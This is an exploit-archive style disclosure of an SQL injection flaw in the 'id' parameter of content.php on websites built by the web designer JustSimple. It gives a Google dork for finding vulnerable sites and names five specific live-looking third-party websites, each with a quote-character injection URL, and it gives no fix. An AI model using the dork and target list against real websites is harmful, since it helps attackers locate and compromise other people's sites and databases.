# Exploit Title :  Web design by JustSimple SQL Injection Vulnerability
# Date : 2018-06-29
# Exploit Author : Iran Cyber Security Group
# Vendor Homepage : www.justsimpledesign.com
# Google Dork : "Web design by JustSimple" inurl:.php?id=
# category : webapps
# Tested on : Win7 , Kali Linux

# Exploit : /content.php?id=[SQL Injection]

Proof of Concept : 

 search google Dork : "Web design by JustSimple" inurl:.php?id=

Demo :
 
 http://www.katerinahotel.com/content.php?id=26' [Sql injection Vulnerability]
 http://www.justsimple.asia/wellgrow/content.php?id=54' [Sql injection Vulnerability]
 http://www.fnbm.com.my/content.php?id=32' [Sql injection Vulnerability] 
 http://www.ycapital.com.hk/content.php?id=31' [Sql injection Vulnerability]
 http://www.obetechpacific.com/content.php?id=18' [Sql injection Vulnerability]
 

# Discovered by : Mr_null